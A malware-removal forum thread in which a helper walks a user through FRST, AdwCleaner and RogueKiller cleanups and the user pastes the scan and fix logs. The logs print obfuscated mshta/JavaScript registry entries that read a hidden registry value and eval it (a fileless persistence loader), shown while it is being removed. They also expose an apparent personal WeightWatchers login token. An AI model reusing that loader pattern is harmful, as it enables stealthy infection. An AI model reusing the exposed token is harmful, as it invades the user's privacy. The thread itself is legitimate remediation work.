Charliew49 Posted November 12, 2017 Author ID:1181953 Share Posted November 12, 2017 Yoan, I followed all the steps, and still get the same popups. See log below: Fix result of Farbar Recovery Scan Tool (x64) Version: 12-11-2017 03 Ran by Charlie (12-11-2017 17:02:58) Run:1 Running from C:\Users\Charlie\Desktop Loaded Profiles: Charlie (Available Profiles: Charlie) Boot Mode: Safe Mode (with Networking) ============================================== fixlist content: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [*Svebx<*>] => "C:\Users\Charlie\AppData\Local\Asjam\rursu.vfimyrtu" <==== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [*Qsewipofto<*>] => "C:\Users\Charlie\AppData\Local\Uxuve\l vac.lnk" <==== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Winlogon: [Shell] - <==== ATTENTION GroupPolicy: Restriction <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION BHO: AVG Web TuneUp -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> No File CHR HomePage: Default -> mysearch.avg.com CHR DefaultSearchURL: Default -> hxxps://mysearch.avg.com/search?rvt=1&sap=dsp&q={searchTerms} CHR DefaultSearchKeyword: Default -> hxxps://mysearch.avg.com CHR DefaultSuggestURL: Default -> hxxps://toolbar.avg.com/acp?q={searchTerms}&o=1 HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Classes\pdal: "C:\WINDOWS\system32\mshta.exe" "javascript:cCqk8iR0U="9Bm";O53U=new ActiveXObject("WScript.Shell");b5veD1="eq5oh";OoFP7=O53U.RegRead("HKCU\\software\\cllbfyv\\pwgf");pjGqK8X0X="b3xw0t";eval(OoFP7);kwg4nSeU="hwSXwy";" <==== ATTENTION HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Classes\yweguk: cmd.exe /c start "" "C:\Users\Charlie\AppData\Local\Aqiqliqoc\nzaqa.cvex" "javascript:xID4y="x";Tm8=new ActiveXObject("WScript.Shell");uSzMj5PF="dmUa4d40";aD67tp=Tm8.RegRead("HKCU\\software\\cllbfyv\\pwgf");nChf99B="iG";eval(aD67tp);Nrf3hI="6pH7iL3w";" <==== ATTENTION Task: {03A2E7C8-1339-428F-9323-E99F1976CEB9} - \McAfee\McAfee Idle Detection Task -> No File <==== ATTENTION Task: {09257EF5-F419-4D7F-BCD8-D2E362191430} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION Task: {30E15181-DAE3-4C0F-B9B0-DFDF919EF936} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION Task: {3DA21760-C086-4BA7-960C-2C1B98E2C622} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION Task: {56271ECE-25BE-42E2-A083-08593745AC10} - \SystemToolsDailyTest -> No File <==== ATTENTION Task: {5ED329CA-9882-499A-8042-59D048F4FC4A} - System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337 => C:\WINDOWS\TEMP\DeleteFolderTask.exe <==== ATTENTION Task: {602B3DF8-98F4-4CD6-81E9-42D5939CCFE7} - \PCDEventLauncherTask -> No File <==== ATTENTION Task: {6064BBC8-744E-477D-B083-93B9E6B7C7D7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION Task: {856C1A0B-D1FE-414A-877F-40CC1A262C0F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION Task: {93A65F06-EFE4-4570-9760-03851C229F92} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION Task: {95D0914A-38F0-4B8A-BAB5-0591CF1A58CA} - System32\Tasks\{5BAA357C-0979-4040-BFD1-F5B84C2AF43C} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe" Task: {9F33BB8D-EA5E-4178-A01D-049835D5EA82} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION Task: {C5154CA2-F863-4B51-B5D3-BA2AFFD820F9} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION Task: {CBEA06BB-9FA1-442E-BA9B-76E01F2756D2} - \PCDoctorBackgroundMonitorTask -> No File <==== ATTENTION AlternateDataStreams: C:\ProgramData\TEMP:18750BD1 [145] C:\ProgramData\TR.exe C:\Users\Charlie\AppData\Local\Uxuve C:\Users\Charlie\AppData\Local\Eflowubub C:\Users\Charlie\AppData\Local\Aqiqliqoc C:\Users\Charlie\AppData\Local\Uwtes C:\Users\Charlie\AppData\Local\Asjam C:\Users\Charlie\AppData\Local\Z@!-d255baf1-abe1-4f84-8b12-14150417ad4a.tmp C:\Users\Charlie\AppData\Local\Z@S!-4d226dde-e80a-4cd1-b594-571eae57a1cf.tmp EmptyTemp: ***************** Processes closed successfully. Error: Restore point can only be created in normal mode. HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Windows\CurrentVersion\Run\\*Svebx<*> => value removed successfully HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Windows\CurrentVersion\Run\\*Qsewipofto<*> => value removed successfully HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value removed successfully C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => moved successfully HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233} => key removed successfully HKLM\Software\Classes\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233} => key removed successfully Chrome HomePage => removed successfully Chrome DefaultSearchURL => removed successfully Chrome DefaultSearchKeyword => removed successfully Chrome DefaultSuggestURL => removed successfully HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Classes\pdal => key removed successfully HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Classes\yweguk => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{03A2E7C8-1339-428F-9323-E99F1976CEB9} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{03A2E7C8-1339-428F-9323-E99F1976CEB9} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\McAfee\McAfee Idle Detection Task => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{09257EF5-F419-4D7F-BCD8-D2E362191430} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{09257EF5-F419-4D7F-BCD8-D2E362191430} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{30E15181-DAE3-4C0F-B9B0-DFDF919EF936} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{30E15181-DAE3-4C0F-B9B0-DFDF919EF936} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3DA21760-C086-4BA7-960C-2C1B98E2C622} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3DA21760-C086-4BA7-960C-2C1B98E2C622} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{56271ECE-25BE-42E2-A083-08593745AC10} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{56271ECE-25BE-42E2-A083-08593745AC10} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemToolsDailyTest => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5ED329CA-9882-499A-8042-59D048F4FC4A} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5ED329CA-9882-499A-8042-59D048F4FC4A} => key removed successfully C:\WINDOWS\System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337 => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337 => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{602B3DF8-98F4-4CD6-81E9-42D5939CCFE7} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{602B3DF8-98F4-4CD6-81E9-42D5939CCFE7} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PCDEventLauncherTask => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6064BBC8-744E-477D-B083-93B9E6B7C7D7} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6064BBC8-744E-477D-B083-93B9E6B7C7D7} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{856C1A0B-D1FE-414A-877F-40CC1A262C0F} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{856C1A0B-D1FE-414A-877F-40CC1A262C0F} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{93A65F06-EFE4-4570-9760-03851C229F92} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{93A65F06-EFE4-4570-9760-03851C229F92} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{95D0914A-38F0-4B8A-BAB5-0591CF1A58CA} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{95D0914A-38F0-4B8A-BAB5-0591CF1A58CA} => key removed successfully C:\WINDOWS\System32\Tasks\{5BAA357C-0979-4040-BFD1-F5B84C2AF43C} => moved successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{5BAA357C-0979-4040-BFD1-F5B84C2AF43C} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9F33BB8D-EA5E-4178-A01D-049835D5EA82} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9F33BB8D-EA5E-4178-A01D-049835D5EA82} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C5154CA2-F863-4B51-B5D3-BA2AFFD820F9} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C5154CA2-F863-4B51-B5D3-BA2AFFD820F9} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CBEA06BB-9FA1-442E-BA9B-76E01F2756D2} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CBEA06BB-9FA1-442E-BA9B-76E01F2756D2} => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PCDoctorBackgroundMonitorTask => key removed successfully C:\ProgramData\TEMP => ":18750BD1" ADS removed successfully. C:\ProgramData\TR.exe => moved successfully C:\Users\Charlie\AppData\Local\Uxuve => moved successfully C:\Users\Charlie\AppData\Local\Eflowubub => moved successfully C:\Users\Charlie\AppData\Local\Aqiqliqoc => moved successfully C:\Users\Charlie\AppData\Local\Uwtes => moved successfully C:\Users\Charlie\AppData\Local\Asjam => moved successfully C:\Users\Charlie\AppData\Local\Z@!-d255baf1-abe1-4f84-8b12-14150417ad4a.tmp => moved successfully C:\Users\Charlie\AppData\Local\Z@S!-4d226dde-e80a-4cd1-b594-571eae57a1cf.tmp => moved successfully =========== EmptyTemp: ========== BITS transfer queue => 7364608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 11898969 B Java, Flash, Steam htmlcache => 564 B Windows/system/drivers => 88860292 B Edge => 2424190 B Chrome => 349183061 B Firefox => 68793652 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 9696 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 128 B systemprofile32 => 128 B LocalService => 3306 B NetworkService => 0 B Charlie => 348311438 B DefaultAppPool => 0 B RecycleBin => 30202249 B EmptyTemp: => 865 MB temporary data Removed. ================================ The system needed a reboot. ==== End of Fixlog 17:04:07 ==== Link to post Share on other sites More sharing options...
Aura Posted November 12, 2017 ID:1181980 Share Posted November 12, 2017 Alright let's do a sweep with AdwCleaner and RogueKiller now. AdwCleaner - Fix Mode Download AdwCleaner and move it to your Desktop Right-click on AdwCleaner.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users) Accept the EULA (I accept), then click on Scan Let the scan complete. Once it's done, make sure that every item listed in the different tabs is checked and click on the Clean button. This will kill all active processes Once the cleaning process is complete, AdwCleaner will ask to restart your computer, do it After the restart, a log will open when logging in. Please copy/paste the content of that log in your next reply RogueKiller Download the right version of RogueKiller for your Windows version (32 or 64-bit) Once done, move the executable file to your Desktop, right-click on it and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users) Click on the Start Scan button in the right panel, which will bring you to another tab, and click on it again (this time it'll be in the bottom right corner) Wait for the scan to complete On completion, the results will be displayed Check every single entry (threat found), and click on the Remove Selected button On completion, the results will be displayed. Click on the Open Report button in the bottom left corner, followed by the Open TXT button (also in the bottom left corner) This will open the report in Notepad. Copy/paste its content in your next reply Your next reply(ies) should therefore contain: Copy/pasted AdwCleaner clean log Copy/pasted RogueKiller clean log Link to post Share on other sites More sharing options...
Charliew49 Posted November 13, 2017 Author ID:1182027 Share Posted November 13, 2017 # AdwCleaner 7.0.4.0 - Logfile created on Mon Nov 13 02:03:54 2017 # Updated on 2017/27/10 by Malwarebytes # Database: 11-10-2017.1 # Running on Windows 10 Pro (X64) # Mode: scan # Support: https://www.malwarebytes.com/support ***** [ Services ] ***** No malicious services found. ***** [ Folders ] ***** No malicious folders found. ***** [ Files ] ***** No malicious files found. ***** [ DLL ] ***** No malicious DLLs found. ***** [ WMI ] ***** No malicious WMI found. ***** [ Shortcuts ] ***** No malicious shortcuts found. ***** [ Tasks ] ***** No malicious tasks found. ***** [ Registry ] ***** PUP.Optional.Legacy, [Key] - HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6} PUP.Optional.ByteFence, [Key] - HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Reason\ReasonByteFence ***** [ Firefox (and derivatives) ] ***** No malicious Firefox entries. ***** [ Chromium (and derivatives) ] ***** PUP.Optional.Legacy, Plugin found: AVG Web TuneUp - /!\ Please Reset the Chrome Synchronization before cleaning the Chrome Preferences: https://support.google.com/chrome/answer/3097271 ************************* C:/AdwCleaner/AdwCleaner[C0].txt - [9235 B] - [2017/9/15 20:41:38] C:/AdwCleaner/AdwCleaner[S0].txt - [10282 B] - [2017/9/15 19:32:16] C:/AdwCleaner/AdwCleaner[S1].txt - [1411 B] - [2017/11/13 2:2:30] ########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt ########## RogueKiller V12.11.23.0 (x64) [Nov 6 2017] (Free) by Adlice Software mail : http://www.adlice.com/contact/ Feedback : https://forum.adlice.com Website : http://www.adlice.com/download/roguekiller/ Blog : http://www.adlice.com Operating System : Windows 10 (10.0.15063) 64 bits version Started in : Safe mode with network support User : Charlie [Administrator] Started from : C:\Users\Charlie\Desktop\RogueKiller_portable64.exe Mode : Delete -- Date : 11/12/2017 21:10:38 (Duration : 00:29:39) ¤¤¤ Processes : 0 ¤¤¤ ¤¤¤ Registry : 9 ¤¤¤ [PUM.HomePage] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-e3963092 -> Replaced (http://go.microsoft.com/fwlink/p/?LinkId=255141) [PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main | Start Page : https://mail.google.com/mail/u/0/#inbox -> Replaced (http://go.microsoft.com/fwlink/p/?LinkId=255141) [PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main | Start Page : https://mail.google.com/mail/u/0/#inbox -> Replaced (http://go.microsoft.com/fwlink/p/?LinkId=255141) [PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://dell13.msn.com/?pc=DCTE -> Replaced (http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome) [PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://dell13.msn.com/?pc=DCTE -> Replaced (http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome) [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve -> Replaced (http://search.msn.com/spbasic.htm) [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve -> Replaced (http://search.msn.com/spbasic.htm) [PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Replaced (1) [PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Replaced (1) ¤¤¤ Tasks : 0 ¤¤¤ ¤¤¤ Files : 2 ¤¤¤ [Adw.WifiHotSpot][Folder] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HotSpot -> Deleted [Adw.WifiHotSpot][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HotSpot\HotSpot.lnk -> Deleted [PUP.Filefinder][Folder] C:\Program Files (x86)\Pluto TV -> Deleted [PUP.Filefinder][Folder] C:\Program Files (x86)\Pluto TV\locales -> Deleted ¤¤¤ WMI : 0 ¤¤¤ ¤¤¤ Hosts File : 0 ¤¤¤ ¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000035f]) ¤¤¤ ¤¤¤ Web browsers : 3 ¤¤¤ [PUP.Gen0][Chrome:Addon] Default : AVG Web TuneUp [chfdnecihphmhljaaejmgoiahnihplgn] -> Deleted [PUM.HomePage][Firefox:Config] 9p71s5n4.default-1495840635264 : user_pref("browser.startup.homepage", "http://www.drudgereport.com/|https://www.washingtontimes.com/|https://www.realclearpolitics.com/index.html|http://dailycaller.com/?refresh=true|http://www.newsmax.com/|https://mail.google.com/mail/u/0/?shva=1#inbox|https://calendar.google.com/calendar/render?tab=mc#g%7Cmonth-3+22844+22881+22857|https://cmx.weightwatchers.com/auth#scope=session%20openid&state=http%3A%2F%2Fcmx.weightwatchers.com%2Fnui%2Fmy-day%3Fmode%3Dfood&id_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IldKZkpkVTlBaDJiS3JzUTE4T2MrOVZFc0s2OD0ifQ.eyJ0b2tlbk5hbWUiOiJpZF90b2tlbiIsImF6cCI6IndlYkNNWCIsInN1YiI6IjJjZTY0YmRmLWI1MTQtNGVjNS04ODFjLTQ4OWZiZmFlMGVmZCIsImxvY2FsZSI6ImVuLVVTIiwiaXNzIjoiaHR0cHM6Ly9hdXRoLndlaWdodHdhdGNoZXJzLmNvbS9vcGVuYW0vb2F1dGgyIiwiaWF0IjoxNTEwMjY3NzQ0LCJNZW1iZXJJRCI6IjQyMjQyOTUxNyIsImF1dGhfdGltZSI6MTUxMDI2Nzc0MiwiZXhwIjoxNTEwMjc0OTQ0LCJ0b2tlblR5cGUiOiJKV1RUb2tlbiIsImF1ZGl0VHJhY2tpbmdJZCI6IjU4NWNkYTEyLWNlNWMtNDRmOC1iZWZmLWU1ZmRlZDcwZmQwNy0yNzMwOTYwMjgiLCJub25jZSI6ImMxOTdmMjI2NzhiOWZkZWY2NDdjNjdlNDg0Yjk5YWZlIiwicmVhbG0iOiIvVVMiLCJhdWQiOiJ3ZWJDTVgiLCJlbnRpdGxlbWVudHMiOlsiY29hY2hpbmctb3JpZW50YXRpb24iLCJjbGFzc2ljLW9ubGluZSJdfQ.MfopEsFTqyIgCcxkK2NQ6dT4Ys3pc5wmRvBkiAvl6zVSu-ovlOyIs8v8Gx-hAio61gvEA8ORCxgfFkvp0E07MFY2z2KLwRusYYtFgqHjtGNK9fKNrPo2xZTJ6Do6gIFeiT8eISlO4FGLg5PUewbdp_0jFHrHtK6XWaZGQXNYv6y_jwbDv38YwzYIzjkSeTVG-683mu3d_UlIoZRVU8sKfFxcN78j7daztpzghV91BKcKSqlq0-dla9LCY8nBkw5K4J44wLMy4ibO0jHrXE9-6cle_tLIAazZS0-DUlCLlE3CqIiE88k4AepU4YwgEqJTBPKENJVWPjOmWz1rVtIeBg"); -> Replaced (about:home) [PUM.NewTab][Firefox:Config] 9p71s5n4.default-1495840635264 : user_pref("browser.newtab.url", "http://search.htrackyourpackages.co?uid=7422a42f-ecf7-4ce3-957d-c2f0fd6040be&uc=20171109&ap=appfocus1&source=g-ccc1-lp0&page=newtab&implementation_id=package_0.2.0"); -> Deleted ¤¤¤ MBR Check : ¤¤¤ +++++ PhysicalDrive0: ST1000DM ST1000DM003-1ER1 SCSI Disk Device +++++ --- User --- [MBR] 316786c695c895c6d6ea4aadd329c9bf [BSP] 0211a033a7d241948b0a48e3946ada20 : HP|VT.Unknown MBR Code Partition table: 0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB 1 - [ACTIVE] ACER (0x27) [VISIBLE] Offset (sectors): 81920 | Size: 12014 MB 2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 24686592 | Size: 941814 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader] User = LL1 ... OK User = LL2 ... OK +++++ PhysicalDrive1: Seagate Slim BK SCSI Disk Device +++++ --- User --- [MBR] d1b7357981c5b9034afbd0a549d1fed7 [BSP] f744d87ba4a71069fee68694d9e13313 : Empty|VT.Unknown MBR Code Partition table: 0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 476939 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader] User = LL1 ... OK Error reading LL2 MBR! ([1] Incorrect function. ) +++++ PhysicalDrive2: Kingston DT 100 G2 USB Device +++++ --- User --- [MBR] 52c64e881be552742858015bc1800b65 [BSP] 33a07a59d299ab4ea9f4ab0156f9d86f : Windows XP MBR Code Partition table: 0 - [ACTIVE] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 8064 | Size: 15256 MB User = LL1 ... OK Error reading LL2 MBR! ([32] The request is not supported. ) +++++ PhysicalDrive3: SDHC Card +++++ --- User --- [MBR] 446a14cffee777eeb3d86e89bfa611c5 [BSP] df4f83c1f72e36823a12b0dfc7617313 : Empty MBR Code Partition table: 0 - [XXXXXX] FAT32-LBA (0xc) [VISIBLE] Offset (sectors): 8192 | Size: 15383 MB User = LL1 ... OK Error reading LL2 MBR! ([32] The request is not supported. ) Link to post Share on other sites More sharing options...
Aura Posted November 13, 2017 ID:1182231 Share Posted November 13, 2017 Good Now let's run a new scan with FRST and provide me a fresh set of logs, so I can look for remnants. Link to post Share on other sites More sharing options...
Charliew49 Posted November 13, 2017 Author ID:1182260 Share Posted November 13, 2017 Will do now. Link to post Share on other sites More sharing options...
Charliew49 Posted November 13, 2017 Author ID:1182268 Share Posted November 13, 2017 Yoan, I got this same pop-up error message as yesterday: Error: _WinAPI_CreateFile Could not open file \\.\PhysicalDrive3 Error: 0 Handle: 0 The logsd from FRST.txt and additions.txt follow. Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 12-11-2017 03 Ran by Charlie (administrator) on CHARLIE-PC (13-11-2017 09:27:35) Running from C:\Users\Charlie\Desktop Loaded Profiles: Charlie (Available Profiles: Charlie) Platform: Windows 10 Pro Version 1703 15063.674 (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: FF) Boot Mode: Safe Mode (with Networking) Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\HelpPane.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation) HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8512760 2015-08-04] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411320 2015-08-04] (Realtek Semiconductor) HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [410616 2017-03-13] () HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [286056 2013-07-30] (Intel Corporation) HKLM\...\Run: [RtHDVBg_PushButton] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411320 2015-08-04] (Realtek Semiconductor) HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-25] (Logitech, Inc.) HKLM\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [239592 2017-10-31] (AVG Technologies CZ, s.r.o.) HKLM\...\Run: [AVGUI.exe] => C:\Program Files (x86)\AVG\Antivirus\AvLaunch.exe [302744 2017-10-20] (AVG Technologies CZ, s.r.o.) HKLM-x32\...\Run: [DBAgent] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe [1540896 2015-07-15] (Seagate Technology LLC) HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [239592 2017-10-31] (AVG Technologies CZ, s.r.o.) HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1284680 2014-01-17] (CANON INC.) HKLM-x32\...\Run: [EaseUS EPM Tray Agent] => C:\Program Files (x86)\EaseUS\EaseUS Partition Master 12.5\bin\TrayPopupE\TrayTipAgentE.exe [256144 2017-09-13] () HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-09-05] (Oracle Corporation) HKLM\...\Policies\Explorer\Run: [BtvStack] => 